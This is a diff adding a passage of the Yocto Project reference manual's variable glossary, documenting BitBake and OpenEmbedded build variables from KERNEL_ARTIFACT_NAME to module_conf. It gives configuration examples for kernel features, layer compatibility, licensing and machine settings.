+         KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+   :term:`KERNEL_DTC_FLAGS`
+      Specifies the ``dtc`` flags that are passed to the Linux kernel build
+      system when generating the device trees (via ``DTC_FLAGS`` environment
+      variable).
+
+      In order to use this variable, the
+      :ref:`kernel-devicetree <ref-classes-kernel-devicetree>` class must
+      be inherited.
+
+   :term:`KERNEL_EXTRA_ARGS`
+      Specifies additional ``make`` command-line arguments the OpenEmbedded
+      build system passes on when compiling the kernel.
+
+   :term:`KERNEL_FEATURES`
+      Includes additional kernel metadata. In the OpenEmbedded build
+      system, the default Board Support Packages (BSPs)
+      :term:`Metadata` is provided through the
+      :term:`KMACHINE` and :term:`KBRANCH`
+      variables. You can use the ``KERNEL_FEATURES`` variable from within
+      the kernel recipe or kernel append file to further add metadata for
+      all BSPs or specific BSPs.
+
+      The metadata you add through this variable includes config fragments
+      and features descriptions, which usually includes patches as well as
+      config fragments. You typically override the ``KERNEL_FEATURES``
+      variable for a specific machine. In this way, you can provide
+      validated, but optional, sets of kernel configurations and features.
+
+      For example, the following example from the ``linux-yocto-rt_4.12``
+      kernel recipe adds "netfilter" and "taskstats" features to all BSPs
+      as well as "virtio" configurations to all QEMU machines. The last two
+      statements add specific configurations to targeted machine types:
+      ::
+
+         KERNEL_EXTRA_FEATURES ?= "features/netfilter/netfilter.scc features/taskstats/taskstats.scc"
+         KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
+         KERNEL_FEATURES_append_qemuall = " cfg/virtio.scc"
+         KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc cfg/paravirt_kvm.scc"
+         KERNEL_FEATURES_append_qemux86-64 = " cfg/sound.scc"
+
+   :term:`KERNEL_FIT_LINK_NAME`
+      The link name of the kernel flattened image tree (FIT) image. This
+      variable is set in the ``meta/classes/kernel-artifact-names.bbclass``
+      file as follows:
+      ::
+
+         KERNEL_FIT_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
+
+      The value of the
+      ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in the same
+      file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+      See the :term:`MACHINE` variable for additional
+      information.
+
+   :term:`KERNEL_FIT_NAME`
+      The base name of the kernel flattened image tree (FIT) image. This
+      variable is set in the ``meta/classes/kernel-artifact-names.bbclass``
+      file as follows:
+      ::
+
+         KERNEL_FIT_NAME ?= "${KERNEL_ARTIFACT_NAME}"
+
+      The value of the :term:`KERNEL_ARTIFACT_NAME`
+      variable, which is set in the same file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+   :term:`KERNEL_IMAGE_LINK_NAME`
+      The link name for the kernel image. This variable is set in the
+      ``meta/classes/kernel-artifact-names.bbclass`` file as follows:
+      ::
+
+         KERNEL_IMAGE_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
+
+      The value of
+      the ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in the same
+      file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+      See the :term:`MACHINE` variable for additional
+      information.
+
+   :term:`KERNEL_IMAGE_MAXSIZE`
+      Specifies the maximum size of the kernel image file in kilobytes. If
+      ``KERNEL_IMAGE_MAXSIZE`` is set, the size of the kernel image file is
+      checked against the set value during the
+      :ref:`ref-tasks-sizecheck` task. The task fails if
+      the kernel image file is larger than the setting.
+
+      ``KERNEL_IMAGE_MAXSIZE`` is useful for target devices that have a
+      limited amount of space in which the kernel image must be stored.
+
+      By default, this variable is not set, which means the size of the
+      kernel image is not checked.
+
+   :term:`KERNEL_IMAGE_NAME`
+      The base name of the kernel image. This variable is set in the
+      ``meta/classes/kernel-artifact-names.bbclass`` file as follows:
+      ::
+
+         KERNEL_IMAGE_NAME ?= "${KERNEL_ARTIFACT_NAME}"
+
+      The value of the
+      :term:`KERNEL_ARTIFACT_NAME` variable,
+      which is set in the same file, has the following value:
+      ::
+
+         KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+   :term:`KERNEL_IMAGETYPE`
+      The type of kernel to build for a device, usually set by the machine
+      configuration files and defaults to "zImage". This variable is used
+      when building the kernel and is passed to ``make`` as the target to
+      build.
+
+      If you want to build an alternate kernel image type, use the
+      :term:`KERNEL_ALT_IMAGETYPE` variable.
+
+   :term:`KERNEL_MODULE_AUTOLOAD`
+      Lists kernel modules that need to be auto-loaded during boot.
+
+      .. note::
+
+         This variable replaces the deprecated :term:`module_autoload`
+         variable.
+
+      You can use the ``KERNEL_MODULE_AUTOLOAD`` variable anywhere that it
+      can be recognized by the kernel recipe or by an out-of-tree kernel
+      module recipe (e.g. a machine configuration file, a distribution
+      configuration file, an append file for the recipe, or the recipe
+      itself).
+
+      Specify it as follows:
+      ::
+
+         KERNEL_MODULE_AUTOLOAD += "module_name1 module_name2 module_name3"
+
+      Including ``KERNEL_MODULE_AUTOLOAD`` causes the OpenEmbedded build
+      system to populate the ``/etc/modules-load.d/modname.conf`` file with
+      the list of modules to be auto-loaded on boot. The modules appear
+      one-per-line in the file. Here is an example of the most common use
+      case:
+      ::
+
+         KERNEL_MODULE_AUTOLOAD += "module_name"
+
+      For information on how to populate the ``modname.conf`` file with
+      ``modprobe.d`` syntax lines, see the :term:`KERNEL_MODULE_PROBECONF` variable.
+
+   :term:`KERNEL_MODULE_PROBECONF`
+      Provides a list of modules for which the OpenEmbedded build system
+      expects to find ``module_conf_``\ modname values that specify
+      configuration for each of the modules. For information on how to
+      provide those module configurations, see the
+      :term:`module_conf_* <module_conf>` variable.
+
+   :term:`KERNEL_PATH`
+      The location of the kernel sources. This variable is set to the value
+      of the :term:`STAGING_KERNEL_DIR` within
+      the :ref:`module <ref-classes-module>` class. For information on
+      how this variable is used, see the
+      ":ref:`kernel-dev/kernel-dev-common:incorporating out-of-tree modules`"
+      section in the Yocto Project Linux Kernel Development Manual.
+
+      To help maximize compatibility with out-of-tree drivers used to build
+      modules, the OpenEmbedded build system also recognizes and uses the
+      :term:`KERNEL_SRC` variable, which is identical to
+      the ``KERNEL_PATH`` variable. Both variables are common variables
+      used by external Makefiles to point to the kernel source directory.
+
+   :term:`KERNEL_SRC`
+      The location of the kernel sources. This variable is set to the value
+      of the :term:`STAGING_KERNEL_DIR` within
+      the :ref:`module <ref-classes-module>` class. For information on
+      how this variable is used, see the
+      ":ref:`kernel-dev/kernel-dev-common:incorporating out-of-tree modules`"
+      section in the Yocto Project Linux Kernel Development Manual.
+
+      To help maximize compatibility with out-of-tree drivers used to build
+      modules, the OpenEmbedded build system also recognizes and uses the
+      :term:`KERNEL_PATH` variable, which is identical
+      to the ``KERNEL_SRC`` variable. Both variables are common variables
+      used by external Makefiles to point to the kernel source directory.
+
+   :term:`KERNEL_VERSION`
+      Specifies the version of the kernel as extracted from ``version.h``
+      or ``utsrelease.h`` within the kernel sources. Effects of setting
+      this variable do not take affect until the kernel has been
+      configured. Consequently, attempting to refer to this variable in
+      contexts prior to configuration will not work.
+
+   :term:`KERNELDEPMODDEPEND`
+      Specifies whether the data referenced through
+      :term:`PKGDATA_DIR` is needed or not. The
+      ``KERNELDEPMODDEPEND`` does not control whether or not that data
+      exists, but simply whether or not it is used. If you do not need to
+      use the data, set the ``KERNELDEPMODDEPEND`` variable in your
+      ``initramfs`` recipe. Setting the variable there when the data is not
+      needed avoids a potential dependency loop.
+
+   :term:`KFEATURE_DESCRIPTION`
+      Provides a short description of a configuration fragment. You use
+      this variable in the ``.scc`` file that describes a configuration
+      fragment file. Here is the variable used in a file named ``smp.scc``
+      to describe SMP being enabled:
+      ::
+
+          define KFEATURE_DESCRIPTION "Enable SMP"
+
+   :term:`KMACHINE`
+      The machine as known by the kernel. Sometimes the machine name used
+      by the kernel does not match the machine name used by the
+      OpenEmbedded build system. For example, the machine name that the
+      OpenEmbedded build system understands as ``core2-32-intel-common``
+      goes by a different name in the Linux Yocto kernel. The kernel
+      understands that machine as ``intel-core2-32``. For cases like these,
+      the ``KMACHINE`` variable maps the kernel machine name to the
+      OpenEmbedded build system machine name.
+
+      These mappings between different names occur in the Yocto Linux
+      Kernel's ``meta`` branch. As an example take a look in the
+      ``common/recipes-kernel/linux/linux-yocto_3.19.bbappend`` file:
+      ::
+
+         LINUX_VERSION_core2-32-intel-common = "3.19.0"
+         COMPATIBLE_MACHINE_core2-32-intel-common = "${MACHINE}"
+         SRCREV_meta_core2-32-intel-common = "8897ef68b30e7426bc1d39895e71fb155d694974"
+         SRCREV_machine_core2-32-intel-common = "43b9eced9ba8a57add36af07736344dcc383f711"
+         KMACHINE_core2-32-intel-common = "intel-core2-32"
+         KBRANCH_core2-32-intel-common = "standard/base"
+         KERNEL_FEATURES_append_core2-32-intel-common = " ${KERNEL_FEATURES_INTEL_COMMON}"
+
+      The ``KMACHINE`` statement says
+      that the kernel understands the machine name as "intel-core2-32".
+      However, the OpenEmbedded build system understands the machine as
+      "core2-32-intel-common".
+
+   :term:`KTYPE`
+      Defines the kernel type to be used in assembling the configuration.
+      The linux-yocto recipes define "standard", "tiny", and "preempt-rt"
+      kernel types. See the ":ref:`kernel-dev/kernel-dev-advanced:kernel types`"
+      section in the
+      Yocto Project Linux Kernel Development Manual for more information on
+      kernel types.
+
+      You define the ``KTYPE`` variable in the
+      :ref:`kernel-dev/kernel-dev-advanced:bsp descriptions`. The
+      value you use must match the value used for the
+      :term:`LINUX_KERNEL_TYPE` value used by the
+      kernel recipe.
+
+   :term:`LABELS`
+      Provides a list of targets for automatic configuration.
+
+      See the :ref:`grub-efi <ref-classes-grub-efi>` class for more
+      information on how this variable is used.
+
+   :term:`LAYERDEPENDS`
+      Lists the layers, separated by spaces, on which this recipe depends.
+      Optionally, you can specify a specific layer version for a dependency
+      by adding it to the end of the layer name. Here is an example:
+      ::
+
+         LAYERDEPENDS_mylayer = "anotherlayer (=3)"
+
+      In this previous example,
+      version 3 of "anotherlayer" is compared against
+      :term:`LAYERVERSION`\ ``_anotherlayer``.
+
+      An error is produced if any dependency is missing or the version
+      numbers (if specified) do not match exactly. This variable is used in
+      the ``conf/layer.conf`` file and must be suffixed with the name of
+      the specific layer (e.g. ``LAYERDEPENDS_mylayer``).
+
+   :term:`LAYERDIR`
+      When used inside the ``layer.conf`` configuration file, this variable
+      provides the path of the current layer. This variable is not
+      available outside of ``layer.conf`` and references are expanded
+      immediately when parsing of the file completes.
+
+   :term:`LAYERRECOMMENDS`
+      Lists the layers, separated by spaces, recommended for use with this
+      layer.
+
+      Optionally, you can specify a specific layer version for a
+      recommendation by adding the version to the end of the layer name.
+      Here is an example:
+      ::
+
+         LAYERRECOMMENDS_mylayer = "anotherlayer (=3)"
+
+      In this previous example, version 3 of "anotherlayer" is compared
+      against ``LAYERVERSION_anotherlayer``.
+
+      This variable is used in the ``conf/layer.conf`` file and must be
+      suffixed with the name of the specific layer (e.g.
+      ``LAYERRECOMMENDS_mylayer``).
+
+   :term:`LAYERSERIES_COMPAT`
+      Lists the versions of the :term:`OpenEmbedded-Core (OE-Core)` for which
+      a layer is compatible. Using the ``LAYERSERIES_COMPAT`` variable
+      allows the layer maintainer to indicate which combinations of the
+      layer and OE-Core can be expected to work. The variable gives the
+      system a way to detect when a layer has not been tested with new
+      releases of OE-Core (e.g. the layer is not maintained).
+
+      To specify the OE-Core versions for which a layer is compatible, use
+      this variable in your layer's ``conf/layer.conf`` configuration file.
+      For the list, use the Yocto Project
+      :yocto_wiki:`Release Name </wiki/Releases>` (e.g.
+      DISTRO_NAME_NO_CAP). To specify multiple OE-Core versions for the
+      layer, use a space-separated list:
+      ::
+
+         LAYERSERIES_COMPAT_layer_root_name = "DISTRO_NAME_NO_CAP DISTRO_NAME_NO_CAP_MINUS_ONE"
+
+      .. note::
+
+         Setting ``LAYERSERIES_COMPAT`` is required by the Yocto Project
+         Compatible version 2 standard.
+         The OpenEmbedded build system produces a warning if the variable
+         is not set for any given layer.
+
+      See the ":ref:`dev-manual/dev-manual-common-tasks:creating your own layer`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`LAYERVERSION`
+      Optionally specifies the version of a layer as a single number. You
+      can use this within :term:`LAYERDEPENDS` for
+      another layer in order to depend on a specific version of the layer.
+      This variable is used in the ``conf/layer.conf`` file and must be
+      suffixed with the name of the specific layer (e.g.
+      ``LAYERVERSION_mylayer``).
+
+   :term:`LD`
+      The minimal command and arguments used to run the linker.
+
+   :term:`LDFLAGS`
+      Specifies the flags to pass to the linker. This variable is exported
+      to an environment variable and thus made visible to the software
+      being built during the compilation step.
+
+      Default initialization for ``LDFLAGS`` varies depending on what is
+      being built:
+
+      -  :term:`TARGET_LDFLAGS` when building for the
+         target
+
+      -  :term:`BUILD_LDFLAGS` when building for the
+         build host (i.e. ``-native``)
+
+      -  :term:`BUILDSDK_LDFLAGS` when building for
+         an SDK (i.e. ``nativesdk-``)
+
+   :term:`LEAD_SONAME`
+      Specifies the lead (or primary) compiled library file (i.e. ``.so``)
+      that the :ref:`debian <ref-classes-debian>` class applies its
+      naming policy to given a recipe that packages multiple libraries.
+
+      This variable works in conjunction with the ``debian`` class.
+
+   :term:`LIC_FILES_CHKSUM`
+      Checksums of the license text in the recipe source code.
+
+      This variable tracks changes in license text of the source code
+      files. If the license text is changed, it will trigger a build
+      failure, which gives the developer an opportunity to review any
+      license change.
+
+      This variable must be defined for all recipes (unless
+      :term:`LICENSE` is set to "CLOSED").
+
+      For more information, see the ":ref:`usingpoky-configuring-lic_files_chksum`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`LICENSE`
+      The list of source licenses for the recipe. Follow these rules:
+
+      -  Do not use spaces within individual license names.
+
+      -  Separate license names using \| (pipe) when there is a choice
+         between licenses.
+
+      -  Separate license names using & (ampersand) when multiple licenses
+         exist that cover different parts of the source.
+
+      -  You can use spaces between license names.
+
+      -  For standard licenses, use the names of the files in
+         ``meta/files/common-licenses/`` or the
+         :term:`SPDXLICENSEMAP` flag names defined in
+         ``meta/conf/licenses.conf``.
+
+      Here are some examples:
+      ::
+
+         LICENSE = "LGPLv2.1 | GPLv3"
+         LICENSE = "MPL-1 & LGPLv2.1"
+         LICENSE = "GPLv2+"
+
+      The first example is from the
+      recipes for Qt, which the user may choose to distribute under either
+      the LGPL version 2.1 or GPL version 3. The second example is from
+      Cairo where two licenses cover different parts of the source code.
+      The final example is from ``sysstat``, which presents a single
+      license.
+
+      You can also specify licenses on a per-package basis to handle
+      situations where components of the output have different licenses.
+      For example, a piece of software whose code is licensed under GPLv2
+      but has accompanying documentation licensed under the GNU Free
+      Documentation License 1.2 could be specified as follows:
+      ::
+
+         LICENSE = "GFDL-1.2 & GPLv2"
+         LICENSE_${PN} = "GPLv2"
+         LICENSE_${PN}-doc = "GFDL-1.2"
+
+   :term:`LICENSE_CREATE_PACKAGE`
+      Setting ``LICENSE_CREATE_PACKAGE`` to "1" causes the OpenEmbedded
+      build system to create an extra package (i.e.
+      ``${``\ :term:`PN`\ ``}-lic``) for each recipe and to add
+      those packages to the
+      :term:`RRECOMMENDS`\ ``_${PN}``.
+
+      The ``${PN}-lic`` package installs a directory in
+      ``/usr/share/licenses`` named ``${PN}``, which is the recipe's base
+      name, and installs files in that directory that contain license and
+      copyright information (i.e. copies of the appropriate license files
+      from ``meta/common-licenses`` that match the licenses specified in
+      the :term:`LICENSE` variable of the recipe metadata
+      and copies of files marked in
+      :term:`LIC_FILES_CHKSUM` as containing
+      license text).
+
+      For related information on providing license text, see the
+      :term:`COPY_LIC_DIRS` variable, the
+      :term:`COPY_LIC_MANIFEST` variable, and the
+      ":ref:`dev-manual/dev-manual-common-tasks:providing license text`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`LICENSE_FLAGS`
+      Specifies additional flags for a recipe you must whitelist through
+      :term:`LICENSE_FLAGS_WHITELIST` in
+      order to allow the recipe to be built. When providing multiple flags,
+      separate them with spaces.
+
+      This value is independent of :term:`LICENSE` and is
+      typically used to mark recipes that might require additional licenses
+      in order to be used in a commercial product. For more information,
+      see the
+      ":ref:`dev-manual/dev-manual-common-tasks:enabling commercially licensed recipes`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`LICENSE_FLAGS_WHITELIST`
+      Lists license flags that when specified in
+      :term:`LICENSE_FLAGS` within a recipe should not
+      prevent that recipe from being built. This practice is otherwise
+      known as "whitelisting" license flags. For more information, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:enabling commercially licensed recipes`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`LICENSE_PATH`
+      Path to additional licenses used during the build. By default, the
+      OpenEmbedded build system uses ``COMMON_LICENSE_DIR`` to define the
+      directory that holds common license text used during the build. The
+      ``LICENSE_PATH`` variable allows you to extend that location to other
+      areas that have additional licenses:
+      ::
+
+         LICENSE_PATH += "path-to-additional-common-licenses"
+
+   :term:`LINUX_KERNEL_TYPE`
+      Defines the kernel type to be used in assembling the configuration.
+      The linux-yocto recipes define "standard", "tiny", and "preempt-rt"
+      kernel types. See the ":ref:`kernel-dev/kernel-dev-advanced:kernel types`"
+      section in the
+      Yocto Project Linux Kernel Development Manual for more information on
+      kernel types.
+
+      If you do not specify a ``LINUX_KERNEL_TYPE``, it defaults to
+      "standard". Together with :term:`KMACHINE`, the
+      ``LINUX_KERNEL_TYPE`` variable defines the search arguments used by
+      the kernel tools to find the appropriate description within the
+      kernel :term:`Metadata` with which to build out the sources
+      and configuration.
+
+   :term:`LINUX_VERSION`
+      The Linux version from ``kernel.org`` on which the Linux kernel image
+      being built using the OpenEmbedded build system is based. You define
+      this variable in the kernel recipe. For example, the
+      ``linux-yocto-3.4.bb`` kernel recipe found in
+      ``meta/recipes-kernel/linux`` defines the variables as follows:
+      ::
+
+         LINUX_VERSION ?= "3.4.24"
+
+      The ``LINUX_VERSION`` variable is used to define :term:`PV`
+      for the recipe:
+      ::
+
+         PV = "${LINUX_VERSION}+git${SRCPV}"
+
+   :term:`LINUX_VERSION_EXTENSION`
+      A string extension compiled into the version string of the Linux
+      kernel built with the OpenEmbedded build system. You define this
+      variable in the kernel recipe. For example, the linux-yocto kernel
+      recipes all define the variable as follows:
+      ::
+
+         LINUX_VERSION_EXTENSION ?= "-yocto-${LINUX_KERNEL_TYPE}"
+
+      Defining this variable essentially sets the Linux kernel
+      configuration item ``CONFIG_LOCALVERSION``, which is visible through
+      the ``uname`` command. Here is an example that shows the extension
+      assuming it was set as previously shown:
+      ::
+
+         $ uname -r
+         3.7.0-rc8-custom
+
+   :term:`LOG_DIR`
+      Specifies the directory to which the OpenEmbedded build system writes
+      overall log files. The default directory is ``${TMPDIR}/log``.
+
+      For the directory containing logs specific to each task, see the
+      :term:`T` variable.
+
+   :term:`MACHINE`
+      Specifies the target device for which the image is built. You define
+      ``MACHINE`` in the ``local.conf`` file found in the
+      :term:`Build Directory`. By default, ``MACHINE`` is set to
+      "qemux86", which is an x86-based architecture machine to be emulated
+      using QEMU:
+      ::
+
+         MACHINE ?= "qemux86"
+
+      The variable corresponds to a machine configuration file of the same
+      name, through which machine-specific configurations are set. Thus,
+      when ``MACHINE`` is set to "qemux86" there exists the corresponding
+      ``qemux86.conf`` machine configuration file, which can be found in
+      the :term:`Source Directory` in
+      ``meta/conf/machine``.
+
+      The list of machines supported by the Yocto Project as shipped
+      include the following:
+      ::
+
+         MACHINE ?= "qemuarm"
+         MACHINE ?= "qemuarm64"
+         MACHINE ?= "qemumips"
+         MACHINE ?= "qemumips64"
+         MACHINE ?= "qemuppc"
+         MACHINE ?= "qemux86"
+         MACHINE ?= "qemux86-64"
+         MACHINE ?= "genericx86"
+         MACHINE ?= "genericx86-64"
+         MACHINE ?= "beaglebone"
+         MACHINE ?= "edgerouter"
+
+      The last five are Yocto Project reference hardware
+      boards, which are provided in the ``meta-yocto-bsp`` layer.
+
+      .. note::
+
+         Adding additional Board Support Package (BSP) layers to your
+         configuration adds new possible settings for ``MACHINE``.
+
+   :term:`MACHINE_ARCH`
+      Specifies the name of the machine-specific architecture. This
+      variable is set automatically from :term:`MACHINE` or
+      :term:`TUNE_PKGARCH`. You should not hand-edit
+      the ``MACHINE_ARCH`` variable.
+
+   :term:`MACHINE_ESSENTIAL_EXTRA_RDEPENDS`
+      A list of required machine-specific packages to install as part of
+      the image being built. The build process depends on these packages
+      being present. Furthermore, because this is a "machine-essential"
+      variable, the list of packages are essential for the machine to boot.
+      The impact of this variable affects images based on
+      ``packagegroup-core-boot``, including the ``core-image-minimal``
+      image.
+
+      This variable is similar to the
+      ``MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`` variable with the exception
+      that the image being built has a build dependency on the variable's
+      list of packages. In other words, the image will not build if a file
+      in this list is not found.
+
+      As an example, suppose the machine for which you are building
+      requires ``example-init`` to be run during boot to initialize the
+      hardware. In this case, you would use the following in the machine's
+      ``.conf`` configuration file:
+      ::
+
+         MACHINE_ESSENTIAL_EXTRA_RDEPENDS += "example-init"
+
+   :term:`MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS`
+      A list of recommended machine-specific packages to install as part of
+      the image being built. The build process does not depend on these
+      packages being present. However, because this is a
+      "machine-essential" variable, the list of packages are essential for
+      the machine to boot. The impact of this variable affects images based
+      on ``packagegroup-core-boot``, including the ``core-image-minimal``
+      image.
+
+      This variable is similar to the ``MACHINE_ESSENTIAL_EXTRA_RDEPENDS``
+      variable with the exception that the image being built does not have
+      a build dependency on the variable's list of packages. In other
+      words, the image will still build if a package in this list is not
+      found. Typically, this variable is used to handle essential kernel
+      modules, whose functionality may be selected to be built into the
+      kernel rather than as a module, in which case a package will not be
+      produced.
+
+      Consider an example where you have a custom kernel where a specific
+      touchscreen driver is required for the machine to be usable. However,
+      the driver can be built as a module or into the kernel depending on
+      the kernel configuration. If the driver is built as a module, you
+      want it to be installed. But, when the driver is built into the
+      kernel, you still want the build to succeed. This variable sets up a
+      "recommends" relationship so that in the latter case, the build will
+      not fail due to the missing package. To accomplish this, assuming the
+      package for the module was called ``kernel-module-ab123``, you would
+      use the following in the machine's ``.conf`` configuration file:
+      ::
+
+         MACHINE_ESSENTIAL_EXTRA_RRECOMMENDS += "kernel-module-ab123"
+
+      .. note::
+
+         In this example, the ``kernel-module-ab123`` recipe needs to
+         explicitly set its :term:`PACKAGES` variable to ensure that BitBake
+         does not use the kernel recipe's :term:`PACKAGES_DYNAMIC` variable to
+         satisfy the dependency.
+
+      Some examples of these machine essentials are flash, screen,
+      keyboard, mouse, or touchscreen drivers (depending on the machine).
+
+   :term:`MACHINE_EXTRA_RDEPENDS`
+      A list of machine-specific packages to install as part of the image
+      being built that are not essential for the machine to boot. However,
+      the build process for more fully-featured images depends on the
+      packages being present.
+
+      This variable affects all images based on ``packagegroup-base``,
+      which does not include the ``core-image-minimal`` or
+      ``core-image-full-cmdline`` images.
+
+      The variable is similar to the ``MACHINE_EXTRA_RRECOMMENDS`` variable
+      with the exception that the image being built has a build dependency
+      on the variable's list of packages. In other words, the image will
+      not build if a file in this list is not found.
+
+      An example is a machine that has WiFi capability but is not essential
+      for the machine to boot the image. However, if you are building a
+      more fully-featured image, you want to enable the WiFi. The package
+      containing the firmware for the WiFi hardware is always expected to
+      exist, so it is acceptable for the build process to depend upon
+      finding the package. In this case, assuming the package for the
+      firmware was called ``wifidriver-firmware``, you would use the
+      following in the ``.conf`` file for the machine:
+      ::
+
+         MACHINE_EXTRA_RDEPENDS += "wifidriver-firmware"
+
+   :term:`MACHINE_EXTRA_RRECOMMENDS`
+      A list of machine-specific packages to install as part of the image
+      being built that are not essential for booting the machine. The image
+      being built has no build dependency on this list of packages.
+
+      This variable affects only images based on ``packagegroup-base``,
+      which does not include the ``core-image-minimal`` or
+      ``core-image-full-cmdline`` images.
+
+      This variable is similar to the ``MACHINE_EXTRA_RDEPENDS`` variable
+      with the exception that the image being built does not have a build
+      dependency on the variable's list of packages. In other words, the
+      image will build if a file in this list is not found.
+
+      An example is a machine that has WiFi capability but is not essential
+      For the machine to boot the image. However, if you are building a
+      more fully-featured image, you want to enable WiFi. In this case, the
+      package containing the WiFi kernel module will not be produced if the
+      WiFi driver is built into the kernel, in which case you still want
+      the build to succeed instead of failing as a result of the package
+      not being found. To accomplish this, assuming the package for the
+      module was called ``kernel-module-examplewifi``, you would use the
+      following in the ``.conf`` file for the machine:
+      ::
+
+         MACHINE_EXTRA_RRECOMMENDS += "kernel-module-examplewifi"
+
+   :term:`MACHINE_FEATURES`
+      Specifies the list of hardware features the
+      :term:`MACHINE` is capable of supporting. For related
+      information on enabling features, see the
+      :term:`DISTRO_FEATURES`,
+      :term:`COMBINED_FEATURES`, and
+      :term:`IMAGE_FEATURES` variables.
+
+      For a list of hardware features supported by the Yocto Project as
+      shipped, see the ":ref:`ref-features-machine`" section.
+
+   :term:`MACHINE_FEATURES_BACKFILL`
+      Features to be added to ``MACHINE_FEATURES`` if not also present in
+      ``MACHINE_FEATURES_BACKFILL_CONSIDERED``.
+
+      This variable is set in the ``meta/conf/bitbake.conf`` file. It is
+      not intended to be user-configurable. It is best to just reference
+      the variable to see which machine features are being backfilled for
+      all machine configurations. See the ":ref:`ref-features-backfill`"
+      section for more information.
+
+   :term:`MACHINE_FEATURES_BACKFILL_CONSIDERED`
+      Features from ``MACHINE_FEATURES_BACKFILL`` that should not be
+      backfilled (i.e. added to ``MACHINE_FEATURES``) during the build. See
+      the ":ref:`ref-features-backfill`" section for more information.
+
+   :term:`MACHINEOVERRIDES`
+      A colon-separated list of overrides that apply to the current
+      machine. By default, this list includes the value of
+      :term:`MACHINE`.
+
+      You can extend ``MACHINEOVERRIDES`` to add extra overrides that
+      should apply to a machine. For example, all machines emulated in QEMU
+      (e.g. ``qemuarm``, ``qemux86``, and so forth) include a file named
+      ``meta/conf/machine/include/qemu.inc`` that prepends the following
+      override to ``MACHINEOVERRIDES``:
+      ::
+
+         MACHINEOVERRIDES =. "qemuall:"
+
+      This
+      override allows variables to be overridden for all machines emulated
+      in QEMU, like in the following example from the ``connman-conf``
+      recipe:
+      ::
+
+         SRC_URI_append_qemuall = " file://wired.config \
+             file://wired-setup \
+             "
+
+      The underlying mechanism behind
+      ``MACHINEOVERRIDES`` is simply that it is included in the default
+      value of :term:`OVERRIDES`.
+
+   :term:`MAINTAINER`
+      The email address of the distribution maintainer.
+
+   :term:`MIRRORS`
+      Specifies additional paths from which the OpenEmbedded build system
+      gets source code. When the build system searches for source code, it
+      first tries the local download directory. If that location fails, the
+      build system tries locations defined by
+      :term:`PREMIRRORS`, the upstream source, and then
+      locations specified by ``MIRRORS`` in that order.
+
+      Assuming your distribution (:term:`DISTRO`) is "poky",
+      the default value for ``MIRRORS`` is defined in the
+      ``conf/distro/poky.conf`` file in the ``meta-poky`` Git repository.
+
+   :term:`MLPREFIX`
+      Specifies a prefix has been added to :term:`PN` to create a
+      special version of a recipe or package (i.e. a Multilib version). The
+      variable is used in places where the prefix needs to be added to or
+      removed from a the name (e.g. the :term:`BPN` variable).
+      ``MLPREFIX`` gets set when a prefix has been added to ``PN``.
+
+      .. note::
+
+         The "ML" in ``MLPREFIX`` stands for "MultiLib". This representation is
+         historical and comes from a time when ``nativesdk`` was a suffix
+         rather than a prefix on the recipe name. When ``nativesdk`` was turned
+         into a prefix, it made sense to set ``MLPREFIX`` for it as well.
+
+      To help understand when ``MLPREFIX`` might be needed, consider when
+      :term:`BBCLASSEXTEND` is used to provide a
+      ``nativesdk`` version of a recipe in addition to the target version.
+      If that recipe declares build-time dependencies on tasks in other
+      recipes by using :term:`DEPENDS`, then a dependency on
+      "foo" will automatically get rewritten to a dependency on
+      "nativesdk-foo". However, dependencies like the following will not
+      get rewritten automatically:
+      ::
+
+         do_foo[depends] += "recipe:do_foo"
+
+      If you want such a dependency to also get transformed, you can do the
+      following:
+      ::
+
+         do_foo[depends] += "${MLPREFIX}recipe:do_foo"
+
+   module_autoload
+      This variable has been replaced by the ``KERNEL_MODULE_AUTOLOAD``
+      variable. You should replace all occurrences of ``module_autoload``
+      with additions to ``KERNEL_MODULE_AUTOLOAD``, for example:
+      ::
+
+         module_autoload_rfcomm = "rfcomm"
+
+      should now be replaced with:
+      ::
+
+         KERNEL_MODULE_AUTOLOAD += "rfcomm"
+
+      See the :term:`KERNEL_MODULE_AUTOLOAD` variable for more information.
+
+   module_conf
+      Specifies `modprobe.d <http://linux.die.net/man/5/modprobe.d>`_
+      syntax lines for inclusion in the ``/etc/modprobe.d/modname.conf``
+      file.
+
+      You can use this variable anywhere that it can be recognized by the
+      kernel recipe or out-of-tree kernel module recipe (e.g. a machine
+      configuration file, a distribution configuration file, an append file
+      for the recipe, or the recipe itself). If you use this variable, you
+      must also be sure to list the module name in the
+      :term:`KERNEL_MODULE_AUTOLOAD`
+      variable.
+
+      Here is the general syntax:
+      ::
+
+         module_conf_module_name = "modprobe.d-syntax"
+
+      You must use the kernel module name override.
+
+      Run ``man modprobe.d`` in the shell to find out more information on
+      the exact syntax you want to provide with ``module_conf``.
+
+      Including ``module_conf`` causes the OpenEmbedded build system to
+      populate the ``/etc/modprobe.d/modname.conf`` file with
+      ``modprobe.d`` syntax lines. Here is an example that adds the options
+      ``arg1`` and ``arg2`` to a module named ``mymodule``:
+      ::
+
+         module_conf_mymodule = "options mymodule arg1=val1 arg2=val2"
+
+      For information on how to specify kernel modules to auto-load on
+      boot, see the :term:`KERNEL_MODULE_AUTOLOAD` variable.
+
